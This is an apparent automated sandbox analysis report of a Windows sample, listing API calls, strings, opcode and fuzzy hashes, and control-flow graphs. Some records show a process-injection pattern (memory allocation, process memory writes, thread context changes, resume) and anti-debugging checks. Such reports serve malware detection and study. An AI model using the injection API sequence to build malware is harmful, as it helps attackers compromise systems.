                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                            • String ID: GetP$Load$aryA$ress
                                                                            • API String ID: 2687962208-977067982
                                                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction ID: 49ecbdcd13c0b8f8d31f0baba31c277a032ca4f124ddc8e1482bfe0f1fe5557e
                                                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction Fuzzy Hash: D2B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA1CAB341D774FA418B94

                                                                            Control-flow Graph

                                                                            control_flow_graph 370 14560e-145626 GetPEB 371 145637-145639 370->371 372 145628-14562c call 13f336 370->372 374 14563a-14563e 371->374 375 145631-145635 372->375 375->371 375->374
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                            • Instruction ID: 9af28f4630563cd1b13032630f3d75952d2d264d059196473a121e5e13df784b
                                                                            • Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                            • Instruction Fuzzy Hash: C3E08C32911228EBCB25DB88C904D8AF3ECFB44B00B5200AAF501D3212C370DE00DBD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                            • Instruction ID: 08b442c9cf4f4d1efd0abe8490a2d77f45e719aab8232e0a897874793d36aa2f
                                                                            • Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                            • Instruction Fuzzy Hash: 6DC08C3400090047CE29891892713A83365B3A7BC2F80048CC4030BA62CB1E9C82DB40

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,C118BA38,?,0013F2F5,?,?,00000000,00000000), ref: 0013F2A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 3664257935-537541572
                                                                            • Opcode ID: 4d2c83241db5f7709d195cad77ecf1589ceb6cd69b95bcb4eec864ec59d86007
                                                                            • Instruction ID: 97e600d4cdb17acb2572cc645635ea72810b38c15bed59a44ab3fa112d4f14fa
                                                                            • Opcode Fuzzy Hash: 4d2c83241db5f7709d195cad77ecf1589ceb6cd69b95bcb4eec864ec59d86007
                                                                            • Instruction Fuzzy Hash: 58212C39E00210EBDF219B64EC41E9B3799AF52764F250238F905A7291DB34ED02C7D1

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,0014C2FD), ref: 0014C222
                                                                              • Part of subcall function 0014C168: _Deallocate.LIBCONCRT ref: 0014C203
                                                                            • CreateThread.KERNELBASE(00000000,00000000,00000188,00157018,00000000,00000000), ref: 0014C256
                                                                            • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,0014C2FD), ref: 0014C262
                                                                            • CloseHandle.KERNEL32(00000000,?,?,0014C2FD), ref: 0014C269
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                                                            • String ID: ole
                                                                            • API String ID: 440434604-1213916275
                                                                            • Opcode ID: ea9fe907fd5c4b929c5549031ee3beb061d7f73b9bba6a56361dad48b42db494
                                                                            • Instruction ID: 8063b708967fe925edc85136329ff571ae3f6c38760d48d88278589768335032
                                                                            • Opcode Fuzzy Hash: ea9fe907fd5c4b929c5549031ee3beb061d7f73b9bba6a56361dad48b42db494
                                                                            • Instruction Fuzzy Hash: 62F027F620111C7FD6113362BC49EBB3A1CDB47BAAF010120FA09930A2CB162D4243B5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __alloca_probe_16.LIBCMT ref: 00142CA8
                                                                            • __alloca_probe_16.LIBCMT ref: 00142D69
                                                                            • __freea.LIBCMT ref: 00142DD0
                                                                              • Part of subcall function 00142001: HeapAlloc.KERNEL32(00000000,001321BA,?,?,00135A1A,?,?,?,00000000,?,001319F6,001321BA,?,?,?,?), ref: 00142033
                                                                            • __freea.LIBCMT ref: 00142DE5
                                                                            • __freea.LIBCMT ref: 00142DF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 1096550386-0
                                                                            • Opcode ID: 0259a6d5f026d732f2b1882758600754817abde557f0b85fbda4d1718814a9f4
                                                                            • Instruction ID: ac0aa534a46f5863042cdcccff39f7a3b086f08e244741700d1bb27848881d54
                                                                            • Opcode Fuzzy Hash: 0259a6d5f026d732f2b1882758600754817abde557f0b85fbda4d1718814a9f4
                                                                            • Instruction Fuzzy Hash: 6A51B3B2A00216AFEF259FA4DC81EBB7AA9EF54354F550129FD08D7120EB31DD90D7A0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,0013C2E3,00000000,00138F02,?,?,C118BA38,00138F02,?), ref: 0013C2FA
                                                                            • TerminateProcess.KERNEL32(00000000,?,0013C2E3,00000000,00138F02,?,?,C118BA38,00138F02,?), ref: 0013C301
                                                                            • ExitProcess.KERNEL32 ref: 0013C313
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: b9170e18488f480dd8698259bdf4786328e6d08ada63cb50805c4544066aa787
                                                                            • Instruction ID: 5684e868a47dad25c99cb3e007a21f83f19e305085f050f7553d153d45a2277c
                                                                            • Opcode Fuzzy Hash: b9170e18488f480dd8698259bdf4786328e6d08ada63cb50805c4544066aa787
                                                                            • Instruction Fuzzy Hash: D9D09276000508AFCF012FB0FE0D9693F2ABF56345F058010BA0A6B431CB32D9939BC0

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00144A6F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00144A9A
                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00144D86,?,00000000,?,00000000,?), ref: 00144FA0
                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00144D86,?,00000000,?,00000000,?), ref: 00144FE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CodeInfoPageValid
                                                                            • String ID:
                                                                            • API String ID: 546120528-0
                                                                            • Opcode ID: 501b0bb8c7e3416c002f3b69f0dc7b4f28f4581b2200d08ad716c20544a96771
                                                                            • Instruction ID: 74ec4a0eee595a6e2dc652ba0e99d664775720b2462972035849d0f54ff7c93c
                                                                            • Opcode Fuzzy Hash: 501b0bb8c7e3416c002f3b69f0dc7b4f28f4581b2200d08ad716c20544a96771
                                                                            • Instruction Fuzzy Hash: DE512674A00A455FDB20CF75C8517BAFBF6EF91304F28816EE0868B262E7759945CB90

                                                                            Control-flow Graph

                                                                            control_flow_graph 183 13f682-13f691 call 13f1b4 186 13f693-13f6b8 LCMapStringEx 183->186 187 13f6ba-13f6d4 call 13f6df LCMapStringW 183->187 191 13f6da-13f6dc 186->191 187->191
                                                                            APIs
                                                                            • LCMapStringEx.KERNELBASE(?,00142D0F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0013F6B6
                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00142D0F,?,?,00000000,?,00000000), ref: 0013F6D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String
                                                                            • String ID:
                                                                            • API String ID: 2568140703-0
                                                                            • Opcode ID: 3ae507bc734d5ec56cd7f0ff94a817261bcad915271bc0431d098464d4334628
                                                                            • Instruction ID: 989ed91fe5dd9ba1ce9bf31af2f04c9c4234fa4802eee3781d3cb4fd4f8d1794
                                                                            • Opcode Fuzzy Hash: 3ae507bc734d5ec56cd7f0ff94a817261bcad915271bc0431d098464d4334628
                                                                            • Instruction Fuzzy Hash: 68F0683650011ABBCF125F91EC05DDE3E26BB587A0F058024FE1926130C732C872AB94

                                                                            Control-flow Graph

                                                                            control_flow_graph 192 144b43-144b65 193 144c7e-144ca4 192->193 194 144b6b-144b7d GetCPInfo 192->194 196 144ca9-144cae 193->196 194->193 195 144b83-144b8a 194->195 197 144b8c-144b96 195->197 198 144cb0-144cb6 196->198 199 144cb8-144cbe 196->199 197->197 200 144b98-144bab 197->200 201 144cc6-144cc8 198->201 202 144cc0-144cc3 199->202 203 144cca 199->203 204 144bcc-144bce 200->204 205 144ccc-144cde 201->205 202->201 203->205 206 144bd0-144c07 call 142b18 call 142e0f 204->206 207 144bad-144bb4 204->207 205->196 208 144ce0-144cee call 134956 205->208 218 144c0c-144c41 call 142e0f 206->218 210 144bc3-144bc5 207->210 213 144bb6-144bb8 210->213 214 144bc7-144bca 210->214 213->214 216 144bba-144bc2 213->216 214->204 216->210 221 144c43-144c4d 218->221 222 144c4f-144c59 221->222 223 144c5b-144c5d 221->223 224 144c6d-144c7a 222->224 225 144c5f-144c69 223->225 226 144c6b 223->226 224->221 227 144c7c 224->227 225->224 226->224 227->208
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(E8458D00,?,00144D92,00144D86,00000000), ref: 00144B75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID:
                                                                            • API String ID: 1807457897-0
                                                                            • Opcode ID: 5f2ff687d9ba4c92b0b688f5948a053ae7de03f2e68229564a95b6425fb5abe2
                                                                            • Instruction ID: bdc4cd5cc049829172a91fa29b9a12037221c364830986cb11c6deec0020e5c2
                                                                            • Opcode Fuzzy Hash: 5f2ff687d9ba4c92b0b688f5948a053ae7de03f2e68229564a95b6425fb5abe2
                                                                            • Instruction Fuzzy Hash: BB5147B15042589BDB218B28CCC4BF67BBCEB55304F2805EDE49AD71A2C334AE46CB20

                                                                            Control-flow Graph

                                                                            control_flow_graph 228 13f2b3-13f2db 229 13f2e1-13f2e3 228->229 230 13f2dd-13f2df 228->230 232 13f2e5-13f2e7 229->232 233 13f2e9-13f2f0 call 13f1e8 229->233 231 13f332-13f335 230->231 232->231 235 13f2f5-13f2f9 233->235 236 13f2fb-13f309 GetProcAddress 235->236 237 13f318-13f32f 235->237 236->237 238 13f30b-13f316 call 13ba6a 236->238 239 13f331 237->239 238->239 239->231
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a8ac1e3ada0d64358addd4180ba8b71626a0b45abc8ac4bf1a093875721d1e6
                                                                            • Instruction ID: 40f21d7faad1b949cf3f503051ce3e33ac0e552fcb25554f41e01f6bc476fbf5
                                                                            • Opcode Fuzzy Hash: 7a8ac1e3ada0d64358addd4180ba8b71626a0b45abc8ac4bf1a093875721d1e6
                                                                            • Instruction Fuzzy Hash: E201F137B002119FDB16DE7AEC4096A33A6FBD0320B29813AF905CB994EB30D842C790
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,00147AF4,00000002,00000000,?,?,?,00147AF4,?,00000000), ref: 0014786F
                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,00147AF4,00000002,00000000,?,?,?,00147AF4,?,00000000), ref: 00147898
                                                                            • GetACP.KERNEL32(?,?,00147AF4,?,00000000), ref: 001478AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 2299586839-711371036
                                                                            • Opcode ID: e928ea14eae213cf650bc48499eaf562925f7d530fc71c9b135326bfbad286c0
                                                                            • Instruction ID: 8a31cdb7d092bb73f89657e68f40fee11dd85e3dda37c3b2e2e53d7f1e119797
                                                                            • Opcode Fuzzy Hash: e928ea14eae213cf650bc48499eaf562925f7d530fc71c9b135326bfbad286c0
                                                                            • Instruction Fuzzy Hash: 9821C832B08102AADB388FA4DA08B9773A7FF50B61B578424E90AD75B4F732DD41C390
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00147AB7
                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00147B00
                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00147B0F
                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00147B57
                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00147B76
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                            • String ID:
                                                                            • API String ID: 415426439-0
                                                                            • Opcode ID: ab476360597c525a72ec0b981422034b4247294c16b6c8ddf0ff58881d91a129
                                                                            • Instruction ID: b1e0629896f5cbbd37abf6f3b3f2b14c4149a724ea8804da29e7112b9508f9db
                                                                            • Opcode Fuzzy Hash: ab476360597c525a72ec0b981422034b4247294c16b6c8ddf0ff58881d91a129
                                                                            • Instruction Fuzzy Hash: 96518172A04206AFDF20DFA4DC41ABE77B8FF58700F294469F915E71E0E7709A458B61
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,0013CC9C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00147108
                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0013CC9C,?,?,?,00000055,?,-00000050,?,?), ref: 00147133
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00147296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                            • String ID: utf8
                                                                            • API String ID: 607553120-905460609
                                                                            • Opcode ID: d5ecdb32a36fc96ecff260ca34d4085667f4bf5dbd634e92e5175abf7bce9c47
                                                                            • Instruction ID: 8c09284025c809b6ffa9006f07056df4d1e98e1b3fb161f24022f7534f527829
                                                                            • Opcode Fuzzy Hash: d5ecdb32a36fc96ecff260ca34d4085667f4bf5dbd634e92e5175abf7bce9c47
                                                                            • Instruction Fuzzy Hash: 0D714771A04302AAEB24AB74DC46FAB73ACEF15714F20442AF915DB1E1EBB0ED41C761
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00134FB2
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0013507E
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00135097
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 001350A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 8eef06445329844fcd774ea97e96a5a6270a20339b6d4ce59186e4bcaa7c2de5
                                                                            • Instruction ID: 9b94f77a924364ea2a939875b12637345bd33499609c00efd2092e039602f8f5
                                                                            • Opcode Fuzzy Hash: 8eef06445329844fcd774ea97e96a5a6270a20339b6d4ce59186e4bcaa7c2de5
                                                                            • Instruction Fuzzy Hash: BC31F775D05318DBDF20EFA4D9897CDBBB8AF08700F1041AAE40DAB250EB719A85CF45
                                                                            APIs
                                                                              • Part of subcall function 0013EC90: GetLastError.KERNEL32(?,00000008,00143196,00000000,00139083), ref: 0013EC94
                                                                              • Part of subcall function 0013EC90: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 0013ED36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001474AE
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001474F8
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001475BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 661929714-0
                                                                            • Opcode ID: 0bb9b7ea9bc6c69ff08ddf7b0682ea0450047733b3d89bc16b5c2080a3bfd45f
                                                                            • Instruction ID: d0df44245265c60076d0367954977269d812e670f3bac09760c8a3d549a98695
                                                                            • Opcode Fuzzy Hash: 0bb9b7ea9bc6c69ff08ddf7b0682ea0450047733b3d89bc16b5c2080a3bfd45f
                                                                            • Instruction Fuzzy Hash: 3B61B0B19086179FEB289F28CD82BBA77A9EF14300F11417AED19CA1E5F734D985CB50
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00138FFE
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00139008
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00139015
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: fc1eec9069dd929d0eee232713a89a62bbc8e2ffddfa467d63c2ef8ad8ec95ff
                                                                            • Instruction ID: 35ec4e2427b5c93a510e823e5e77237f6751fd063534765ab74713b47017eed2
                                                                            • Opcode Fuzzy Hash: fc1eec9069dd929d0eee232713a89a62bbc8e2ffddfa467d63c2ef8ad8ec95ff
                                                                            • Instruction Fuzzy Hash: 7131C574901318ABCB21DF68D98978DBBB8BF18710F5041DAF41CA7260E7709F818F44
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,0014355B,?,?,?,?,?,?,00000000), ref: 0014378D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: 89d66f51284d3baca7bf30083e5f82740102faa57745865108419815114fad7f
                                                                            • Instruction ID: e7e2f816e61fd623b9df28a4d4e7dc42565729140f3855262c92dd140c83cc31
                                                                            • Opcode Fuzzy Hash: 89d66f51284d3baca7bf30083e5f82740102faa57745865108419815114fad7f
                                                                            • Instruction Fuzzy Hash: 9EB13B71610609DFD719CF28C486B657BE0FF45365F268658E8AACF2B1C335EA92CB40
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00134CE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
